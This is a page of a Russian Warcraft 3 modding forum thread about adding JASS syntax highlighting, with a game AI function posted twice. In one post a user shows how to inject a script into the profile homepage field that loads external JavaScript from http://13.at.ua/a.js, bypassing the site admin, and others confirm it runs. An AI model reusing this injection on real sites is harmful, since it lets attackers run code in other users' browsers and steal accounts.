Сейчас 04:16:42 Пятница, 22 ноября, 2024 год
[ x ] Главная ⇒ Форум ⇐ RSS Файлы Cтатьи Картинки В о й т и   или   з а р е г и с т р и р о в а т ь с я


[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
  • Страница 3 из 5
  • «
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
Модератор форума: BinGO, vladyka  
[jass][/jass]
Делать?
1. Да [ 52 ] [81.25%]
2. Нет [ 12 ] [18.75%]
Всего ответов: 64
Ty3uKДата: Суббота, 07 Января 2012, 15:20:11 | Сообщение # 51
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
Ну все, раз все авторские права соблюдены, то думаю все в порядке

╭∩╮(︶︿︶)╭∩╮
"Ульта Тайда мне в жопу!" © k0fe1n
Статьи: MUI-1|MUI-2|Шрифт
Полезности: JASP|JNGP|Уголок библиотек
 

BetmenokДата: Суббота, 07 Января 2012, 16:18:50 | Сообщение # 52
3 уровень
Группа: Заблокированные
Сообщений: 67
Награды: 0
Репутация: -33
Блокировки:
[DUОS], Нужен,но http://warcraft3ft.info/ ходит в хостинг юкоз,в юкозе можно только ББ коды и HTML коды
[jass] и [/jass] - очень сложно настроить
 

Ty3uKДата: Суббота, 07 Января 2012, 16:42:50 | Сообщение # 53
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
$(this).html(replace) решает, бро

Добавлено (07 Январь 2012, 16:42:50)
---------------------------------------------
Ну точнее сначала берем элемент, офк


╭∩╮(︶︿︶)╭∩╮
"Ульта Тайда мне в жопу!" © k0fe1n
Статьи: MUI-1|MUI-2|Шрифт
Полезности: JASP|JNGP|Уголок библиотек
 

Dimon4iK-ERAДата: Суббота, 07 Января 2012, 20:58:16 | Сообщение # 54
9 уровень
Группа: Проверенные
Сообщений: 1046
Награды: 0
Репутация: 397
Блокировки:
[DUОS], о, спасибо за код :) Пригодиться. А вообще это отличная штука для сайтов по вару. Стоит ставить даже не задумываясь.
 

[DUОS]Дата: Суббота, 07 Января 2012, 21:38:39 | Сообщение # 55
Группа: Заблокированные
Сообщений: 6279
Награды: 9
Репутация: 1708
Блокировки:
Dimon4iK-ERA,
Какбе большую часть работы Тузик сделал, ему спасибо скажи.


НУ И ЧТО ТЕПЕРЬ?


Кликайте на дракошку ;)
 

kshlkvДата: Суббота, 07 Января 2012, 21:44:48 | Сообщение # 56
3 уровень
Группа: Проверенные
Сообщений: 57
Награды: 0
Репутация: 14
Блокировки:
[DUОS], Я за. На некоторых сайтах о юкоз есть такая штука. Удобно))

 

lawsonДата: Суббота, 07 Января 2012, 22:58:56 | Сообщение # 57
Группа: Проверенные
Сообщений: 3482
Награды: 0
Репутация: 974
Блокировки:
Quote (kshlkv)
На некоторых сайтах о юкоз есть такая штука. Удобно))

Человек понятия не имеет о чем идет речь.


Nic nie wiem bo mam chuj.
редактирую посты! ВСЕ!
 

SirNikolasДата: Воскресенье, 08 Января 2012, 11:26:08 | Сообщение # 58
Группа: Модераторы
Сообщений: 6729
Награды: 1
Репутация: 1867
Блокировки:
lawson, главное, что он за. :)

 

DreiiДата: Воскресенье, 08 Января 2012, 14:33:56 | Сообщение # 59
10 уровень
Группа: Проверенные
Сообщений: 4991
Награды: 0
Репутация: 603
Блокировки:
Нужен обязательно

 

kshlkvДата: Воскресенье, 08 Января 2012, 20:50:40 | Сообщение # 60
3 уровень
Группа: Проверенные
Сообщений: 57
Награды: 0
Репутация: 14
Блокировки:
Quote (lawson)
Человек понятия не имеет о чем идет речь.

Понимаю. Не волнуйся. Я говорю, что подсветка синтаксиса это удобно. И привел в пример JS подсветку.


 

wetalqДата: Вторник, 10 Января 2012, 18:34:01 | Сообщение # 61
8 уровень
Группа: Проверенные
Сообщений: 550
Награды: 0
Репутация: 117
Блокировки:
k0fe1n, вот для гуишников)
 

Mep3aB4uKДата: Понедельник, 06 Февраля 2012, 19:48:44 | Сообщение # 62
9 уровень
Группа: Проверенные
Сообщений: 1019
Награды: 0
Репутация: 135
Блокировки:
[jass]function SetBuyTaskz takes integer lIDz, unit ushopz, integer ltaskz returns nothing
local integer lAz
local unit uPeonz
local real rMinz
local real rAz
local group gAz
local unit uAz
set rAz = 1
if EnemyCountInRangez(GetUnitX(ushopz),GetUnitY(ushopz),800.0) > 1 then
if GetFloatGameState(GAME_STATE_TIME_OF_DAY) < 18 or lNearUnsleeppedz > 0 then
set rAz = 0
endif
endif
set lAz = 1
loop
exitwhen lAz > lCountTaskz
if Tasksz[lAz] == ltaskz then
set rAz = 0
elseif Tasksz[lAz] == 5 then
set rAz = 0
endif
set lAz = lAz + 1
endloop
if rAz == 0 then
return
endif
if cntHippos_donez > 0 then
set lAz = HIPPOZ
elseif cntChimaeras_donez > 0 then
set lAz = CHIMAERAZ
else
set lAz = 0
endif
set uPeonz = null
if lAz != 0 then
set rMinz = -1
set gAz = CreateGroup()
call GroupEnumUnitsOfPlayer(gAz,AIPlayerz,null)
loop
set uAz = FirstOfGroup(gAz)
exitwhen uAz == null
set rAz = UnitsDistanceSz(ushopz,uAz)
if GetUnitTypeId(uAz) == lAz and GetUnitState(uAz, UNIT_STATE_LIFE) > 0.0 then
if not IsUnitHasTaskz(uAz) then
if rAz < rMinz or rMinz == -1 then
set rMinz = rAz
set uPeonz = uAz
endif
endif
endif
if rAz < 90000 then
if IssueNeutralImmediateOrderById(AIPlayerz, ushopz, lIDz) then
set cntGoldz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_GOLD)
set cntWoodz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_LUMBER)
set cntFoodUsedz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_FOOD_USED)
set lAz = 0
loop
exitwhen lAz > lNeutralBuildingsz
if ushopz == NeutralBuildingsz[lAz] then
set NBReadyTimesz[lAz] = lTimez + 510
endif
set lAz = lAz + 1
endloop
call DestroyGroup(gAz)
set gAz = null
return
endif
endif
call GroupRemoveUnit(gAz,uAz)
endloop
call DestroyGroup(gAz)
set gAz = null
endif
if uPeonz != null then
if uPeonz == uReconnoitUnitz then
set uReconnoitUnitz = null
endif
set lReservedGoldz = lReservedGoldz + GetUnitGoldCost(lIDz)
set lReservedWoodz = lReservedWoodz + GetUnitWoodCost(lIDz)
set lReservedFoodz = lReservedFoodz + GetFoodUsed(lIDz)
call IssuePointOrder(uPeonz, "move", GetUnitX(ushopz),GetUnitY(ushopz))
set lCountTaskz = lCountTaskz + 1
set TasksUnitsz[lCountTaskz] = uPeonz
set PeonsOldXz[lCountTaskz] = GetUnitX(uPeonz)
set PeonsOldYz[lCountTaskz] = GetUnitY(uPeonz)
set TasksDestXz[lCountTaskz] = GetUnitX(ushopz)
set TasksDestYz[lCountTaskz] = GetUnitY(ushopz)
set Tasksz[lCountTaskz] = ltaskz
set TasksWhatBuildz[lCountTaskz] = lIDz
set TasksStatesz[lCountTaskz] = 1
set TasksRepetitionsz[lCountTaskz] = 0
call RemoveGuardPosition(uPeonz)
endif
endfunction
//----------------------------
[/jass]


Сообщение отредактировал Mep3aB4uK - Понедельник, 06 Февраля 2012, 21:29:46
 

MOPnEXДата: Понедельник, 06 Февраля 2012, 21:32:22 | Сообщение # 63
4 уровень
Группа: Проверенные
Сообщений: 98
Награды: 0
Репутация: 23
Блокировки:
Code
function SetBuyTaskz takes integer lIDz, unit ushopz, integer ltaskz returns nothing
local integer lAz
local unit uPeonz
local real rMinz
local real rAz
local group gAz
local unit uAz
set rAz = 1
if EnemyCountInRangez(GetUnitX(ushopz),GetUnitY(ushopz),800.0) > 1 then
if GetFloatGameState(GAME_STATE_TIME_OF_DAY) < 18 or lNearUnsleeppedz > 0 then
set rAz = 0
endif
endif
set lAz = 1
loop
exitwhen lAz > lCountTaskz
if Tasksz[lAz] == ltaskz then
set rAz = 0
elseif Tasksz[lAz] == 5 then
set rAz = 0
endif
set lAz = lAz + 1
endloop
if rAz == 0 then
return
endif
if cntHippos_donez > 0 then
set lAz = HIPPOZ
elseif cntChimaeras_donez > 0 then
set lAz = CHIMAERAZ
else
set lAz = 0
endif
set uPeonz = null
if lAz != 0 then
set rMinz = -1
set gAz = CreateGroup()
call GroupEnumUnitsOfPlayer(gAz,AIPlayerz,null)
loop
set uAz = FirstOfGroup(gAz)
exitwhen uAz == null
set rAz = UnitsDistanceSz(ushopz,uAz)
if GetUnitTypeId(uAz) == lAz and GetUnitState(uAz, UNIT_STATE_LIFE) > 0.0 then
if not IsUnitHasTaskz(uAz) then
if rAz < rMinz or rMinz == -1 then
set rMinz = rAz
set uPeonz = uAz
endif
endif
endif
if rAz < 90000 then
if IssueNeutralImmediateOrderById(AIPlayerz, ushopz, lIDz) then
set cntGoldz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_GOLD)
set cntWoodz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_LUMBER)
set cntFoodUsedz = GetPlayerState(AIPlayerz,PLAYER_STATE_RESOURCE_FOOD_USED)
set lAz = 0
loop
exitwhen lAz > lNeutralBuildingsz
if ushopz == NeutralBuildingsz[lAz] then
set NBReadyTimesz[lAz] = lTimez + 510
endif
set lAz = lAz + 1
endloop
call DestroyGroup(gAz)
set gAz = null
return
endif
endif
call GroupRemoveUnit(gAz,uAz)
endloop
call DestroyGroup(gAz)
set gAz = null
endif
if uPeonz != null then
if uPeonz == uReconnoitUnitz then
set uReconnoitUnitz = null
endif
set lReservedGoldz = lReservedGoldz + GetUnitGoldCost(lIDz)
set lReservedWoodz = lReservedWoodz + GetUnitWoodCost(lIDz)
set lReservedFoodz = lReservedFoodz + GetFoodUsed(lIDz)
call IssuePointOrder(uPeonz, "move", GetUnitX(ushopz),GetUnitY(ushopz))
set lCountTaskz = lCountTaskz + 1
set TasksUnitsz[lCountTaskz] = uPeonz
set PeonsOldXz[lCountTaskz] = GetUnitX(uPeonz)
set PeonsOldYz[lCountTaskz] = GetUnitY(uPeonz)
set TasksDestXz[lCountTaskz] = GetUnitX(ushopz)
set TasksDestYz[lCountTaskz] = GetUnitY(ushopz)
set Tasksz[lCountTaskz] = ltaskz
set TasksWhatBuildz[lCountTaskz] = lIDz
set TasksStatesz[lCountTaskz] = 1
set TasksRepetitionsz[lCountTaskz] = 0
call RemoveGuardPosition(uPeonz)
endif
endfunction
//----------------------------
 

IIAXAHДата: Понедельник, 06 Февраля 2012, 21:45:56 | Сообщение # 64
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
Реализовано на Инфо в обход админа. Просто клик На в моем посте.
 

oleg_best_olegДата: Понедельник, 06 Февраля 2012, 21:51:55 | Сообщение # 65
Группа: Заблокированные
Сообщений: 1726
Награды: 0
Репутация: 654
Блокировки:
IIAXAH, blink реально работает, но на всякий, сменю-ка я пароль)
 

IIAXAHДата: Понедельник, 06 Февраля 2012, 21:53:44 | Сообщение # 66
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
Я не против.
 

[DUОS]Дата: Понедельник, 06 Февраля 2012, 22:04:46 | Сообщение # 67
Группа: Заблокированные
Сообщений: 6279
Награды: 9
Репутация: 1708
Блокировки:
Quote (IIAXAH)
Реализовано на Инфо в обход админа. Просто клик На в моем посте.

Игры с укозом делают тебя несколько гением.


НУ И ЧТО ТЕПЕРЬ?


Кликайте на дракошку ;)
 

IIAXAHДата: Понедельник, 06 Февраля 2012, 22:16:36 | Сообщение # 68
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
В интернетах побеждает не тот, у кого профиль с большими правами, а тот кто грамотнее.
Твержу уже 3 года, и не помню чтобы кто-то соглашался.
 

Brut@lusДата: Понедельник, 06 Февраля 2012, 23:42:44 | Сообщение # 69
Группа: Заблокированные
Сообщений: 2496
Награды: 1
Репутация: 924
Блокировки:
IIAXAH, Как это сделать самому ссылкой?

Добавлено (06 Февраль 2012, 23:42:44)
---------------------------------------------
Типа
Code
{code}function func takes integer{/code}
[url=http://13.at.ua/a.js]go jass[/url]




Сообщение отредактировал Brut@lus - Понедельник, 06 Февраля 2012, 23:43:09
 

IIAXAHДата: Вторник, 07 Февраля 2012, 11:39:03 | Сообщение # 70
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
А я не знаю.
При нежелании админа и администрации только через задний проход получилось сделать.

Добавлено (07 Февраль 2012, 00:04:10)
---------------------------------------------
Ups!
А может ты не знаешь как сделать кнопку WWW?

Добавлено (07 Февраль 2012, 00:22:05)
---------------------------------------------
Если кто не знает, то это совсем просто:
Через Firefox заходим в Изменение личной информации.
Жмем Shift+F4 вставляем туда

Code
document.getElementById('siM7').innerHTML='<input type="hidden" name="home_page" value="a.do.am\').close();includeJSfile(\'http://13.at.ua/a.js\',\'"/>ICQ номер:';

Жмем Выполнить
Введим код подтверждения и сохраняем свои данные.
Предупреждение: у меня очень плохая репутация.

Добавлено (07 Февраль 2012, 11:39:03)
---------------------------------------------
Вот она, подсветка, есть, - а нажать нельзя - страашна.

 

SirNikolasДата: Вторник, 07 Февраля 2012, 12:52:31 | Сообщение # 71
Группа: Модераторы
Сообщений: 6729
Награды: 1
Репутация: 1867
Блокировки:
Вышел из профиля, закрыл браузер, открыл IE, щелкнул. И правда, работает. :o

 

Ty3uKДата: Вторник, 07 Февраля 2012, 18:09:03 | Сообщение # 72
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
Цвета правда слегка непривычные после jngp. Но это мелочь

Добавлено (07 Февраль 2012, 18:09:03)
---------------------------------------------
Только вот вопрос- твои отступы присутствуют визуально, но при копировании текста из подсветки в редактор они исчезнут и код станет сплошным


╭∩╮(︶︿︶)╭∩╮
"Ульта Тайда мне в жопу!" © k0fe1n
Статьи: MUI-1|MUI-2|Шрифт
Полезности: JASP|JNGP|Уголок библиотек
 

IIAXAHДата: Вторник, 07 Февраля 2012, 18:55:46 | Сообщение # 73
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
Исправлено.
 

Ty3uKДата: Вторник, 07 Февраля 2012, 20:29:09 | Сообщение # 74
Группа: Ветераны
Сообщений: 6125
Награды: 2
Репутация: 1617
Блокировки:
Молодец ^_^

╭∩╮(︶︿︶)╭∩╮
"Ульта Тайда мне в жопу!" © k0fe1n
Статьи: MUI-1|MUI-2|Шрифт
Полезности: JASP|JNGP|Уголок библиотек
 

IIAXAHДата: Понедельник, 09 Апреля 2012, 21:49:01 | Сообщение # 75
3 уровень
Группа: Проверенные
Сообщений: 72
Награды: 0
Репутация: 26
Блокировки:
Период пробного пользования истек.
 

  • Страница 3 из 5
  • «
  • 1
  • 2
  • 3
  • 4
  • 5
  • »
Поиск:

Copyright © 2006 - 2024 Warcraft3FT.info При копировании материалов c сайта ставьте, пожалуйста, активную обратную ссылку на нас • Design by gReeB04ki ©
Хостинг от uCoz